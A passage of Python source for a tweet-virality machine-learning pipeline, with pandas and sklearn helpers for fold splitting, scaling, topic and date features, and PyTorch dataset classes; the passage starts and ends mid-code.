    Columns are processed in chunks of 1000 to bound peak memory.
    Returns (train, test).

    Fixes vs. original: removed an unused function-local
    ``from joblib import Parallel, delayed`` import (neither name was used).
    ``num_workers`` is kept for interface compatibility but remains unused,
    as before (the joblib backend uses the module-level ``n_cpus``).
    """
    l_train = len(train)
    assert train[norm_cols].columns.equals(test[norm_cols].columns)
    col_chunks = [norm_cols[i:i + 1000] for i in range(0, len(norm_cols), 1000)]
    for cols_chunk in col_chunks:
        data_chunk = pd.concat([train[cols_chunk], test[cols_chunk]]).values
        scaler = StandardScaler()
        with parallel_backend('threading', n_jobs=n_cpus):
            scaler.fit(data_chunk)
        data_chunk = scaler.transform(data_chunk)
        train.loc[:, cols_chunk] = data_chunk[:l_train]  # todo LONGEST RUNTIME and memory
        test.loc[:, cols_chunk] = data_chunk[l_train:]  # todo LONGEST RUNTIME and memory
    return train, test
def split2folds_user_viral(df, n_folds, seed_folds, label_cols=None, foldnum_col='fold'):
    """Add a fold-number column, stratified on the concatenation of the two
    label_cols (e.g. user id x virality)."""
    combo_col = label_cols[0] + "_" + label_cols[1]
    df[combo_col] = df[label_cols[0]].astype(str) + "_" + df[label_cols[1]].astype(str)
    df[combo_col] = df[combo_col].astype('category')
    splitter = StratifiedKFold(n_splits=n_folds, shuffle=True, random_state=seed_folds)
    df[foldnum_col] = np.nan
    fold_pos = df.columns.get_loc(foldnum_col)
    # Dummy feature matrix: only the stratification labels matter.
    for fold_num, (_, val_idx) in enumerate(
        splitter.split(np.zeros(df.shape[0]), df[combo_col])
    ):
        df.iloc[val_idx, fold_pos] = fold_num
    df[foldnum_col] = df[foldnum_col].astype(int)
    # Drop the temporary stratification key.
    del df[combo_col]
    return df
def split2folds_viral_only(df, n_folds, seed_folds, label_col='label', foldnum_col='fold'):
    """Add a fold-number column stratified on ``label_col`` alone."""
    splitter = StratifiedKFold(n_splits=n_folds, shuffle=True, random_state=seed_folds)
    df[foldnum_col] = np.nan
    fold_pos = df.columns.get_loc(foldnum_col)
    for fold_num, (_, val_idx) in enumerate(
        splitter.split(df.values[:, :1], df[label_col])
    ):
        df.iloc[val_idx, fold_pos] = fold_num
    df[foldnum_col] = df[foldnum_col].astype(int)
    return df
def split2folds_simple(df, n_folds, seed_folds, foldnum_col='fold'):
    """Add an unstratified KFold fold-number column to df.

    Fix: ``KFold`` was used here without being imported anywhere in this
    module (only ``StratifiedKFold`` was), so this function raised
    NameError when called; ``KFold`` is now imported at the top of the file.
    """
    splitter = KFold(n_splits=n_folds, shuffle=True, random_state=seed_folds)
    df[foldnum_col] = np.nan
    for fold, (train_idx, val_idx) in enumerate(splitter.split(df.values[:, :1])):
        df.iloc[val_idx, df.columns.get_loc(foldnum_col)] = fold
    df[foldnum_col] = df[foldnum_col].astype(int)
    return df
def get_folds(cfg, train, default_seed_folds=24):
    """Attach a 'fold' column to train according to cfg.folds_split_method.

    Only the 'user_viral' method is currently wired up; any other value
    returns train unchanged.  ``default_seed_folds`` is unused (kept for
    interface compatibility).
    """
    if cfg.folds_split_method == 'user_viral':
        train = split2folds_user_viral(
            train,
            cfg.n_folds,
            cfg.seed_folds,
            label_cols=['tweet_user_id', 'virality'],
            foldnum_col='fold',
        )
    return train
def get_feat_cols(train):
    """Partition train's columns into feature groups.

    Returns a 6-tuple: (all feature columns, media-image, text,
    user-description, user-image, and the remaining "plain" features).
    """
    excluded = {'virality', 'tweet_id', 'fold', 'is_test'}
    feat_cols = [
        col for col in train.columns
        if col not in excluded and not col.startswith('target_')
    ]
    media_img_feat_cols = [col for col in train.columns if col.startswith('img_feature')]
    text_feat_cols = [col for col in train.columns if col.startswith('text_feature')]
    user_des_feat_cols = [col for col in train.columns if col.startswith('user_des_feature')]
    user_img_feat_cols = [col for col in train.columns if col.startswith('user_img_feature')]
    vectorized = set(media_img_feat_cols + text_feat_cols
                     + user_img_feat_cols + user_des_feat_cols)
    feats_some = [col for col in feat_cols if col not in vectorized]
    return (feat_cols, media_img_feat_cols, text_feat_cols,
            user_des_feat_cols, user_img_feat_cols, feats_some)
def cond_drop_imgtext(cfg, df):
    """Drop whole feature groups from df according to the cfg.drop_* flags."""
    (_, media_cols, text_cols,
     user_des_cols, user_img_cols, _) = get_feat_cols(df)
    group_flags = [
        (cfg.drop_media_img_feats, media_cols),
        (cfg.drop_text_feats, text_cols),
        (cfg.drop_user_des_feats, user_des_cols),
        (cfg.drop_user_img_feats, user_img_cols),
    ]
    for flag, cols in group_flags:
        if flag:
            df.drop(cols, axis=1, inplace=True)
    return df
def add_topic_count(df):
    """Add an 'n_topics' column: how many topic ids each tweet carries.

    Rows with a missing 'tweet_topic_ids' get the mean topic count of the
    whole column (truncated to int by the final cast).
    """
    nan_fill = '[0]'  # sentinel list-string for tweets without topics
    topics = df['tweet_topic_ids'].fillna(nan_fill)
    # each value is a string like "[36, 37]"; eval turns it into a list
    n_topics = topics.apply(lambda x: len(eval(x)))
    n_topics_mean = n_topics.mean()
    # BUG FIX: the sentinel is '[0]', not '0' — the old comparison
    # (topics == '0') never matched, so missing rows always counted as 1
    # instead of receiving the column mean.
    n_topics = np.where(topics == nan_fill, n_topics_mean, n_topics)
    df['n_topics'] = n_topics.astype(int)
    return df
def add_topic_ids(df):
    """Expand 'tweet_topic_ids' into per-topic count columns topic_id_*.

    Missing topic lists become "['0']" so every row gets a topic_id_0
    dummy. Columns whose per-row count can exceed 1 also get a
    *_hthan1_binary presence flag. The raw column is dropped.

    Fixes vs. original: removed the dead `df.drop('tweet_topic_ids', 1)`
    (result discarded; positional axis raises on pandas>=2), replaced the
    removed `.sum(level=0)` with `.groupby(level=0).sum()`, and made the
    split pattern a raw string.
    """
    df.fillna({'tweet_topic_ids': "['0']"}, inplace=True)
    # "[36, 37]" -> ["36", "37"] -> dummy columns, re-aggregated per row
    topic_ids = (
        df['tweet_topic_ids'].str.strip('[]').str.split(r'\s*,\s*').explode()
        .str.get_dummies().groupby(level=0).sum().add_prefix('topic_id_')
    )
    # the "'0'" sentinel keeps its quotes in the dummy name; strip them
    topic_ids.rename(columns=lambda x: x.replace("'", ""), inplace=True)
    df = df.join(topic_ids)
    for col_ in topic_ids.columns:
        if df[col_].max() > 1:
            # presence flag for topics that can repeat within one tweet
            df[f"{col_}_hthan1_binary"] = (df[col_] > 0).astype(np.int8)
    df.drop(columns='tweet_topic_ids', inplace=True)
    return df
#
# def replace_add_new_topic_ids(train, test):
# # add topic_id cols (57) with number of times the topic is in the sample
# # add _binary cols (45) where =1 if topic_id is more than once
# old_topic_id_cols = [col for col in train.columns if 'topic_id' in col]
# print(f"old_topic_id_cols: {old_topic_id_cols}")
# len_train = train.shape[0]
# train = pd.concat([train, test]).reset_index(drop=True)
# del test;
# _ = gc.collect()
# train.drop(old_topic_id_cols, axis=1, inplace=True)
# train, new_topic_id_cols = add_new_topic_ids(base_dir, train, df_name='train_test')
# # todo cols ['topic_id_117' 'topic_id_123' 'topic_id_38'] are not in new_topic_id_cols
# # done: only one sample==1 for each topic_id_117 topic_id_123 topic_id_38 [0 42274 42274 42274] [1 1 1 1]
# for col_ in new_topic_id_cols:
# if train[col_].max() > 1:
# train[f"{col_}_hthan1_binary"] = (train[col_] > 0).astype(np.int8)
# # train.drop(col_, axis=1, inplace=True)
# test = train.iloc[len_train:, :].reset_index(drop=True)
# train = train.iloc[:len_train, :]
# return train, test
def extract_feats_media_text(df):
    """Lasso (L1 logistic) feature selection over the image feature columns.

    NOTE(review): this looks like an unfinished scratch function — it
    ignores its `df` argument, references `vectorized_media_df`,
    `SelectFromModel`, `LogisticRegression`, `timeit` and `collections`
    (none defined/imported in this module's visible scope) and returns
    nothing. Confirm before calling.
    """
    # todo extact_feats_media_text
    # Set the target as well as dependent variables from image data.
    y = vectorized_media_df['virality']
    x = vectorized_media_df.loc[:, vectorized_media_df.columns.str.contains("img_")]
    # Run Lasso regression for feature selection.
    sel_model = SelectFromModel(LogisticRegression(C=1, penalty='l1', solver='liblinear'))
    # time the model fitting
    start = timeit.default_timer()
    # Fit the trained model on our data
    sel_model.fit(x, y)
    stop = timeit.default_timer()
    print('Time: ', stop - start)
    # get index of good features
    sel_index = sel_model.get_support()
    # count the no of columns selected
    counter = collections.Counter(sel_model.get_support())
    print(counter)
def save_preprocessed(cfg, train, test, path_train, path_test):
    """Write the preprocessed train/test frames to CSV, refusing to overwrite."""
    for path in (path_train, path_test):
        assert not os.path.isfile(path), f"WON'T OVERWRITE/SAVE: file exists {os.path.basename(path)}"
    train.to_csv(path_train, index=False)
    test.to_csv(path_test, index=False)
def get_raw_train_tweet_cols(df):
    """Return the raw column lists of train_tweets.csv and users.csv.

    FIX: the original built both lists and implicitly returned None; the
    lists are now returned as (tweet_cols, user_cols). `df` is kept only
    for signature compatibility and is unused.
    """
    # get cols from train_tweets.csv and users.csv
    init_tweets_cols = ['tweet_id', 'tweet_user_id', 'tweet_created_at_year',
                        'tweet_created_at_month', 'tweet_created_at_day',
                        'tweet_created_at_hour', 'tweet_hashtag_count', 'tweet_url_count',
                        'tweet_mention_count', 'tweet_has_attachment', 'tweet_attachment_class',
                        'tweet_language_id', 'tweet_topic_ids', 'virality']
    init_users_cols = ['user_id', 'user_like_count', 'user_followers_count',
                       'user_following_count', 'user_listed_on_count', 'user_has_location',
                       'user_tweet_count', 'user_has_url', 'user_verified',
                       'user_created_at_year', 'user_created_at_month']
    return init_tweets_cols, init_users_cols
def add_new_topic_ids(base_dir, df, df_name='train'):
    """Merge per-tweet topic_id_* count columns into df.

    Reads the raw tweet CSV(s) under <base_dir>/Tweets, expands
    'tweet_topic_ids' into one count column per topic id, and left-merges
    them into df on 'tweet_id'. Returns (df, topic column list) — note
    the list also contains 'tweet_id', matching the original behavior.

    Fixes vs. original: `df.drop('tweet_topic_ids')` tried to drop a ROW
    (axis=0 default) and discarded the result — now drops the column and
    keeps it; `.sum(level=0)` (removed in pandas 2.0) replaced with
    `.groupby(level=0).sum()`; raw regex string for the split pattern.
    """
    usecols = ['tweet_id', 'tweet_topic_ids']
    if df_name == 'train_test':
        # build the topic vocabulary over train AND test tweets
        df_tweets = pd.read_csv(os.path.join(base_dir, 'Tweets', 'train_tweets.csv'),
                                usecols=usecols)
        df_tweets_test = pd.read_csv(os.path.join(base_dir, 'Tweets', 'test_tweets.csv'),
                                     usecols=usecols)
        df_tweets = pd.concat([df_tweets, df_tweets_test]).reset_index(drop=True)
    else:
        df_tweets = pd.read_csv(os.path.join(base_dir, 'Tweets', f'{df_name}_tweets.csv'),
                                usecols=usecols)
    df_tweets.fillna({'tweet_topic_ids': "['0']"}, inplace=True)
    topic_ids = (
        df_tweets['tweet_topic_ids'].str.strip('[]').str.split(r'\s*,\s*').explode()
        .str.get_dummies().groupby(level=0).sum().add_prefix('topic_id_')
    )
    # the "'0'" sentinel keeps its quotes in the dummy name; strip them
    topic_ids.rename(columns=lambda x: x.replace("'", ""), inplace=True)
    topic_ids['tweet_id'] = df_tweets['tweet_id']
    if 'tweet_topic_ids' in df.columns:
        df = df.drop(columns='tweet_topic_ids')
    df = df.merge(topic_ids, how='left', on='tweet_id')
    return df, list(topic_ids.columns)
# stdlib
import gc
import os
import warnings
from collections import defaultdict
from multiprocessing import cpu_count

# third-party
import joblib
import numpy as np
import pandas as pd
import torch
from joblib import parallel_backend
from sklearn.model_selection import KFold, StratifiedKFold  # KFold: required by split2folds_simple
from sklearn.preprocessing import LabelBinarizer, StandardScaler
from tqdm import tqdm
# silence pandas/sklearn deprecation chatter in notebook output
warnings.filterwarnings('ignore')
pd.set_option("display.max_colwidth", 100)
pd.set_option("display.max_rows", 20)
# short aliases used throughout this module
osj = os.path.join; osl = os.listdir
n_cpus = cpu_count()
class ViralDataset(torch.utils.data.Dataset):
    """Tabular dataset: features as float32 tensors, 'virality' as long target.

    In 'test' mode __getitem__ returns only the feature tensor; otherwise
    it returns (features, target) pairs.
    """

    def __init__(self, df: pd.DataFrame, feat_cols: list, mode: str):
        self.X = df[feat_cols].values
        self.mode = mode
        if mode != 'test':
            # labels only exist outside of test mode
            self.targets = df['virality'].values

    def __len__(self):
        return len(self.X)

    def __getitem__(self, idx):
        features = torch.tensor(self.X[idx], dtype=torch.float32)
        if self.mode == 'test':
            return features
        target = torch.tensor(self.targets[idx], dtype=torch.long)
        return features, target
class ExtractFeatsDataset(torch.utils.data.Dataset):
    """Tabular dataset with configurable target columns.

    A single target column yields long (classification) targets; several
    columns yield a float32 target vector. 'test' mode returns features only.
    """

    def __init__(self, df: pd.DataFrame, feat_cols: list, target_cols: list, mode: str):
        self.X = df[feat_cols].values
        self.mode = mode
        if mode != 'test':
            if len(target_cols) == 1:
                # single-label classification target
                self.targets = df[target_cols[0]].values
                self.target_dtype = torch.long
            else:
                # multi-output (regression-style) target vector
                self.targets = df[target_cols].values
                self.target_dtype = torch.float32

    def __len__(self):
        return len(self.X)

    def __getitem__(self, idx):
        features = torch.tensor(self.X[idx], dtype=torch.float32)
        if self.mode == 'test':
            return features
        return features, torch.tensor(self.targets[idx], dtype=self.target_dtype)
def to_binary_categories(df, cat_col='tweet_language_id'):
    """Collapse cat_col to 0 (value was 0) / 1 (anything else), as int8."""
    df.loc[:, cat_col] = df[cat_col].ne(0).astype(np.int8)
    return df
def freq_encoding(df, freq_cols: list, main_col='tweet_id'):
    """Append a '<col>_freq' column per entry of freq_cols: how often each
    value of that column occurs in df (counted via main_col)."""
    for col in freq_cols:
        counts = (df.groupby([col])[main_col].count()
                  .reset_index()
                  .rename(columns={main_col: '{}_freq'.format(col)}))
        df = df.merge(counts, how='left', on=col)
    return df
def bin_feats(df, feats=None, n_bins_default=20):
    """Add a '<feat>_binned' quantile-bin code column for each feature.

    Bin edges are the unique quantiles of the feature (n_bins per-feature,
    default n_bins_default); codes come from pd.cut, so values at/below
    the lowest edge get code -1. Features already containing '_binned'
    are skipped.

    FIX: the mutable default argument `feats=[]` is replaced by a None
    sentinel (same observable behavior, no shared default object).
    """
    feats = [] if feats is None else feats
    bin_counts = defaultdict(lambda: n_bins_default)
    bin_counts['user_tweet_count'] = 20
    for feature in feats:
        if '_binned' in feature:
            continue
        n_bins = bin_counts[feature]
        if n_bins:
            bins = np.unique(df[feature].quantile(np.linspace(0, 1, n_bins)).values)
            df[feature + '_binned'] = pd.cut(
                df[feature], bins=bins, duplicates='drop'
            ).cat.codes
    return df
def to_categorical(df):
    """Cast the known boolean-ish flag columns to pandas 'category' dtype."""
    for col in ('tweet_has_attachment', 'user_has_location',
                'user_has_url', 'user_verified'):
        df[col] = df[col].astype('category')
    return df
def change2float32(df):
    """Downcast every float64 column to float32 to halve its memory use."""
    for col in df.select_dtypes('float64').columns:
        df[col] = df[col].astype(np.float32)
    return df
def merge_df2media(df, df_media):
    """Aggregate per-media rows to one row per tweet and merge into df.

    Adds the mean of each media feature column per tweet, 'num_media'
    (distinct media per tweet, 0 when none) and a 'tweet_has_media' flag.
    NOTE: mutates df_media in place (drops its 'media_id' column).
    """
    # distinct media count per tweet
    num_media = (df_media.groupby('tweet_id')['media_id']
                 .nunique()
                 .reset_index())
    df_media.drop('media_id', axis=1, inplace=True)
    num_media.columns = ['tweet_id', 'num_media']
    df_media = df_media.merge(num_media, how='left', on='tweet_id')
    media_cols = [col for col in df_media if col not in ['tweet_id','media_id']]
    # collapse the multiple media rows of one tweet into their column means
    df_media = df_media.groupby('tweet_id')[media_cols].mean().reset_index()
    # df_media = mean_feats.merge(df_media[['tweet_id']], how='left', on='tweet_id')
    # del mean_feats; _ = gc.collect()
    df_media['tweet_has_media'] = True
    df = df.merge(df_media, how='left', on='tweet_id')
    # fillna False if tweet has no media
    df['tweet_has_media'] = df['tweet_has_media'].fillna(False)
    # the same for the count of number of media per tweet
    df['num_media'] = df['num_media'].fillna(0).astype(np.int8)
    return df
# def add_num_media_user(df):
# # todo when not debug: df['num_media'].equals(df['num_media_user'])
# num_media_user = df.groupby('tweet_id')['num_media'].sum().reset_index()
# num_media_user.columns = ['tweet_id','num_media_user']
# df = df.merge(num_media_user, how='left', on='tweet_id')
# df['num_media_user'] = df['num_media_user'].astype(np.int8)
# return df
def tweets_user_created_date(df):
    """For each tweet time unit (year/month/day/hour) add per-user columns
    'tweets_in_<unit>_<value>' counting how many tweets that user posted
    in each unit value (0 when none).
    """
    for feat_ in ['tweet_created_at_year', 'tweet_created_at_month', 'tweet_created_at_day',
                  'tweet_created_at_hour']:
        # counts_df_cols = ['tweet_user_id']+[f"tweets_in_{feat_.split('_')[-1]}_{time_}" for time_ in np.sort(df[feat_].unique())]
        # tweet_user_ids = np.sort(df['tweet_user_id'].unique())
        # counts_df = pd.DataFrame(index=range(tweet_user_ids), columns=counts_df_cols)
        # counts_df['tweet_user_id'] = tweet_user_ids
        # value_counts per user, pivoted so each unit value becomes a column
        counts_map = df.groupby('tweet_user_id')[feat_].apply(lambda x: x.value_counts())
        counts_map = counts_map.unstack(level=1)
        counts_map.columns = [f"tweets_in_{feat_.split('_')[-1]}_"+str(col) for col in counts_map.columns]
        counts_map = counts_map.fillna(0).reset_index()
        df = df.merge(counts_map, how='left', on='tweet_user_id')
    return df
    # n_tweets_time_user = df.groupby('tweet_user_id')[feat_].count().reset_index()
    # n_tweets_time_user.columns = ['tweet_user_id', f"n_tweets_{feat_.split('_')[-1]}_user_count"]
    # df = df.merge(n_tweets_time_user, how='left', on='tweet_user_id')
def create_date_col(df):
    """Build a datetime 'date' column (month/day/year) from the tweet date parts."""
    date_parts = df[['tweet_created_at_year', 'tweet_created_at_month',
                     'tweet_created_at_day']]
    as_text = date_parts.apply(
        lambda row: '{}/{}/{}'.format(
            str(row['tweet_created_at_month']).strip(),
            str(row['tweet_created_at_day']).strip(),
            str(row['tweet_created_at_year']).strip()),
        axis=1)
    df['date'] = pd.to_datetime(as_text)
    return df
def add_sincos(df):
    """Encode hour-of-day cyclically as 'sin_hour' / 'cos_hour' columns."""
    angle = 2 * np.pi * df['tweet_created_at_hour'] / 24.0
    df = df.join([np.sin(angle).rename('sin_hour'),
                  np.cos(angle).rename('cos_hour')])
    return df
def add_dummy_dates(df):
    """One-hot encode the tweet/user creation date parts into ohe_* columns."""
    dummy_specs = [('tweet_created_at_year', 'ohe_year'),
                   ('tweet_created_at_month', 'ohe_month'),
                   ('tweet_created_at_day', 'ohe_day'),
                   ('user_created_at_year', 'ohe_user_year'),
                   ('user_created_at_month', 'ohe_user_month')]
    dummies = [pd.get_dummies(df[col], prefix=pref) for col, pref in dummy_specs]
    return df.join(dummies)
def add_date_feats(df):
    """Derive date-based features, then drop the raw date-part columns.

    Adds: a 'date' column plus sin/cos hour and one-hot date dummies
    (via helpers), quarterly per-user resampled aggregates of the tweet
    count columns, 'days_since_tweet' relative to a fixed 2021-07-01
    reference, several *_2days rate features and *_div_* ratio features.
    """
    # todo OHE date
    # todo to sin, cos(date)
    #df_old_index = df.index
    df = create_date_col(df)
    df = add_sincos(df)
    df = add_dummy_dates(df)
    cols_resample = ['tweet_hashtag_count', 'tweet_url_count', 'tweet_mention_count',
                     ]
    date_freqs = ['1Q'] # ,'1M']
    # todo DON't use _func_min if does not affect CV (low feat importance)
    stats = ['sum','mean','std','max'] # ['mean', 'max', 'min', 'median', 'std']
    for freq_ in date_freqs:
        for stat_ in stats:
            # per-user, per-quarter aggregate of the count columns; the
            # set_index/reset_index pair is repeated on every iteration
            df.set_index('date', inplace=True)
            g = (df.groupby('tweet_user_id').resample(freq_, closed='left')
                 [cols_resample].agg(stat_)
                 .astype(np.float32)
                 ) # .set_index('date'))
            g = g.unstack('date').fillna(0)
            g.columns = [col1 + f'_func_{stat_}_' + col2.strftime('%Y-%m-%d') for (col1, col2) in g.columns]
            g.reset_index(inplace=True)
            # g = g.rename(columns ={col: f"{col}_rsmpl_{freq_}_func_{stat_}"
            #                        for col in g.columns if col not in ['tweet_user_id','date']})
            #df = df.reset_index().merge(g, how='left', on='tweet_user_id')
            df = df.reset_index().merge(g, how='left', on='tweet_user_id')
    # df.reset_index(drop=False, inplace=True)
    # todo count 'tweet_id' for each period for user
    # fixed "today" reference so the features are reproducible
    today = pd.to_datetime('7/1/2021')
    df['days_since_tweet'] = (today - df['date']).dt.days # .astype(int)
    df['user_followers_count_2days'] = df['user_followers_count'] / df['days_since_tweet']
    df['user_following_count_2days'] = df['user_following_count'] / df['days_since_tweet']
    df['user_listed_on_count_2days'] = df['user_listed_on_count'] / df['days_since_tweet']
    df['user_tweet_count_2days'] = df['user_tweet_count'] / df['days_since_tweet']
    df['tweet_hashtag_count_2days'] = df['tweet_hashtag_count'] / df['days_since_tweet']
    df['tweet_mention_count_2days'] = df['tweet_mention_count'] / df['days_since_tweet']
    df['tweet_url_count_2days'] = df['tweet_url_count'] / df['days_since_tweet']
    # todo not a date related functions:
    # NOTE(review): 'tweet_mention_count_div_*' is assigned twice in each
    # of the three groups below (harmless duplicate work) — confirm intent.
    df['tweet_mention_count_div_followers'] = df['tweet_mention_count'].divide(df['user_followers_count']+1)
    df['tweet_url_count_div_followers'] = df['tweet_url_count'].divide(df['user_followers_count']+1)
    df['tweet_hashtag_count_div_followers'] = df['tweet_hashtag_count'].divide(df['user_followers_count']+1)
    df['tweet_mention_count_div_followers'] = df['tweet_mention_count'].divide(df['user_followers_count']+1)
    df['tweet_mention_count_div_n_tweets'] = df['tweet_mention_count'].divide(df['user_tweet_count']+1)
    df['tweet_url_count_div_n_tweets'] = df['tweet_url_count'].divide(df['user_tweet_count']+1)
    df['tweet_hashtag_count_div_n_tweets'] = df['tweet_hashtag_count'].divide(df['user_tweet_count']+1)
    df['tweet_mention_count_div_n_tweets'] = df['tweet_mention_count'].divide(df['user_tweet_count']+1)
    df['tweet_mention_count_div_likes'] = df['tweet_mention_count'].divide(df['user_like_count']+1)
    df['tweet_url_count_div_likes'] = df['tweet_url_count'].divide(df['user_like_count']+1)
    df['tweet_hashtag_count_div_likes'] = df['tweet_hashtag_count'].divide(df['user_like_count']+1)
    df['tweet_mention_count_div_likes'] = df['tweet_mention_count'].divide(df['user_like_count']+1)
    cols_drop = ['date', 'tweet_created_at_year', 'tweet_created_at_month',
                 'tweet_created_at_day',
                 'user_created_at_year', 'user_created_at_month']
    df.drop(cols_drop, axis=1, inplace=True)
    return df
def ohe_func(df, cat_col, ohe_tfm=None, prefix=None):
    """One-hot encode df[cat_col] into '<prefix>_<cat_col>_<i>' columns and
    drop the original column.

    Args:
        df: frame to encode; returned with the dummy columns appended.
        cat_col: name of the categorical column.
        ohe_tfm: any fit/transform encoder; a fresh LabelBinarizer by default.
        prefix: optional extra prefix for the generated column names.

    FIX: the default used to be a single shared LabelBinarizer instance
    (mutable default argument) — every call re-used and re-fit the same
    object. A new encoder is now created per call.
    """
    if ohe_tfm is None:
        ohe_tfm = LabelBinarizer()
    ohe_tfm.fit(df[cat_col])
    ohe_transformed = ohe_tfm.transform(df[cat_col])
    stem = f'{prefix}_{cat_col}' if prefix else cat_col
    cat_cols = [f'{stem}_{i}' for i in range(ohe_transformed.shape[1])]
    ohe_df = pd.DataFrame(ohe_transformed, index=df.index, columns=cat_cols)
    df = pd.concat([df, ohe_df], axis=1)
    df.drop(cat_col, axis=1, inplace=True)
    return df
def drop_unnecessary_cols(cfg, df):
    """Optionally drop rare one-hot language-id columns (keep ids 0, 1, 3)."""
    cols_drop = []
    if cfg.drop_rare_ohe_language_ids and cfg.one_hot_encode:
        lang_leave_ids = {0, 1, 3}
        cols_drop.extend(f'tweet_language_id_{i}' for i in range(31)
                         if i not in lang_leave_ids)
    existing = [c for c in cols_drop if c in df.columns]
    if existing:
        df.drop(existing, axis=1, inplace=True)
    return df
class Features():
    """Feature-engineering pipeline for the tweet-virality dataset.

    get_data_stage1 loads and merges the raw CSVs (tweets, media, text,
    users) into one frame containing both train and test rows;
    get_data_stage2 derives date/topic/frequency/virality features and
    splits the frame back into (train, test) by presence of 'virality'.
    """
    def __init__(self,):
        # fitted transformers keyed by name (populated elsewhere)
        self.transformers = {}
        # fill value for missing media image-feature columns
        self.impute_img_feature_nulls = -1
        self.media_img_feat_cols = []
        self.text_feat_cols = []
        self.user_des_feat_cols = []
        self.user_img_feat_cols = []
        # union of topic ids in train and test , 0 - nan value, min=36, max=172
        # xor train, test = [ 38, 117, 123, 165]
        # in test but not in train = [ 38, 117, 123]
        self.unique_topic_ids = [ 0, 36, 37, 38, 39, 43, 44, 45, 52, 58, 59, 60, 61,
                                  63, 68, 71, 72, 73, 78, 79, 80, 81, 82, 87, 88, 89,
                                  91, 93, 98, 99, 100, 101, 104, 111, 112, 117, 118, 119, 120,
                                  121, 122, 123, 125, 126, 127, 147, 148, 149, 150, 151, 152, 153,
                                  155, 156, 163, 165, 169, 170, 171, 172]
        # columns safe to downcast to int8 when they contain no nulls
        self.cols2int8 = ['fold', 'user_created_at_month', 'tweet_created_at_day', 'tweet_created_at_hour',
                          'tweet_hashtag_count', 'tweet_url_count', 'tweet_mention_count', 'tweet_has_attachment',
                          'virality', 'tweet_has_media', 'user_has_url', 'user_verified', 'num_media',
                          'user_id', 'tweet_user_id']
        # 'tweet_created_at_year', 'user_created_at_year',
        self.cols2int8 += [f'tweet_language_id_{i}' for i in range(30)]
    def get_data_stage1(self, cfg, base_dir, n_samples=int(1e10)):
        """Load and merge all raw CSVs into one frame (train + test rows).

        Reads tweets, vectorized media/text features and user tables from
        base_dir, joins them on tweet/user ids and applies dtype
        downcasting plus the cfg-driven feature-group drops.
        """
        df = pd.read_csv(osj(base_dir, 'Tweets',f'train_tweets.csv'), nrows=n_samples)
        test = pd.read_csv(osj(base_dir, 'Tweets',f'test_tweets.csv'), nrows=n_samples)
        # test_tweet_ids = test['tweet_id'].to_list()
        # self.tabular_feats.append()
        df = pd.concat([df, test])
        del test; _ = gc.collect()
        df = change2float32(df)
        df = self.optimize_ints(df)
        #df.drop('tweet_attachment_class', axis=1, inplace=True)
        # try using 'media_id' columns
        df_media = pd.read_csv(osj(base_dir, 'Tweets',f'train_tweets_vectorized_media.csv'))
        df_media_test = pd.read_csv(osj(base_dir, 'Tweets',f'test_tweets_vectorized_media.csv'))
        df_media = pd.concat([df_media, df_media_test])
        df_media = change2float32(df_media)
        df = merge_df2media(df, df_media)
        del df_media, df_media_test; _ = gc.collect()
        df_text = pd.read_csv(osj(base_dir, 'Tweets',f'train_tweets_vectorized_text.csv'))
        df_text_test = pd.read_csv(osj(base_dir, 'Tweets',f'test_tweets_vectorized_text.csv'))
        df_text = pd.concat([df_text, df_text_test])
        text_feat_cols = ['text_'+ col for col in df_text.columns if col.startswith('feature_')]
        df_text.columns = ['tweet_id'] + text_feat_cols
        # shift by 13 before log — presumably keeps all inputs positive; confirm range
        df_text.loc[:, text_feat_cols] = np.log(df_text[text_feat_cols] + 13)
        df_text = change2float32(df_text)
        df = df.merge(df_text, how='left', on='tweet_id')
        del df_text, df_text_test; _ = gc.collect()
        users = pd.read_csv(osj(base_dir, 'Users','users.csv'))
        # log of _count feats
        users_des = pd.read_csv(osj(base_dir, 'Users','user_vectorized_descriptions.csv'))
        # for col in ['tweet_hashtag_count','tweet_url_count','tweet_mention_count']:
        #     users[col] = users[col].astype(int)
        users_img = pd.read_csv(osj(base_dir, 'Users','user_vectorized_profile_images.csv'))
        user_des_feat_cols = ['user_des_'+col for col in users_des.columns if col.startswith('feature')]
        users_des.columns = ['user_id'] + user_des_feat_cols
        user_img_feat_cols = ['user_img_'+col for col in users_img.columns if col.startswith('feature')]
        users_img.columns = ['user_id'] + user_img_feat_cols
        # user_data = users # .merge(users, how='left', on='user_id')
        user_data = users.merge(users_des, how='left', on='user_id')
        user_data = user_data.merge(users_img, how='left', on='user_id')
        user_data = change2float32(user_data)
        user_data = self.optimize_ints(user_data) # # no nulls in user_data 25-may
        df = df.merge(user_data, how='left', left_on='tweet_user_id', right_on='user_id')
        df.drop('user_id', axis=1, inplace=True)
        df = cond_drop_imgtext(cfg, df)
        # df = add_num_media_user(df)
        del users_des, users_img, user_data;
        _ = gc.collect()
        return df # , test_tweet_ids
    def get_data_stage2(self, cfg, df):
        """Derive engineered features and split back into (train, test)."""
        df = tweets_user_created_date(df) # add feats: number of user tweets in time period (year, month, day, hour)
        df = add_date_feats(df)
        df = bin_feats(df, feats=['tweet_mention_count','user_tweet_count',
                                  'user_followers_count','user_following_count',
                                  'user_listed_on_count'])
        df = add_topic_count(df)
        df = add_topic_ids(df)
        bool_cols = df.select_dtypes(include='bool').columns
        df[bool_cols] = df[bool_cols].astype(np.int8)
        if cfg.one_hot_encode:
            df = ohe_func(df, cat_col='tweet_language_id', ohe_tfm=LabelBinarizer())
            df = ohe_func(df, cat_col='tweet_attachment_class', ohe_tfm=LabelBinarizer())
        else:
            df['tweet_attachment_class'] = df['tweet_attachment_class'].astype('category').cat.codes
        # df = to_binary_categories(df, cat_col='tweet_language_id')
        media_img_feat_cols = [col for col in df.columns if col.startswith('img_feature_')]
        if cfg.impute_nulls:
            df.loc[:,media_img_feat_cols] = df[media_img_feat_cols].fillna(self.impute_img_feature_nulls)
        if cfg.add_user_virality:
            df = self.add_virality_feature(df)
        df = freq_encoding(df, freq_cols=['tweet_user_id'], main_col='tweet_id')
        df = drop_unnecessary_cols(cfg, df)
        # log (feats) :
        cols2log = ['user_like_count','user_followers_count',
                    'user_following_count', 'user_listed_on_count',
                    'user_tweet_count']
        # 'tweet_hashtag_count' , 'tweet_url_count', 'tweet_mention_count'
        cols2log = [col for col in df.columns if col in cols2log]
        df = logtransform(df, cols2log)
        # print("df.shape after merging all csv files:", df.shape)
        # print("df.dtypes.value_counts():\n", df.dtypes.value_counts())
        # train = df[~df['tweet_id'].isin(test_tweet_ids)]
        # test = df[df['tweet_id'].isin(test_tweet_ids)]
        # rows with a target are train; target-less rows form the test set
        train = df[~df['virality'].isnull()]
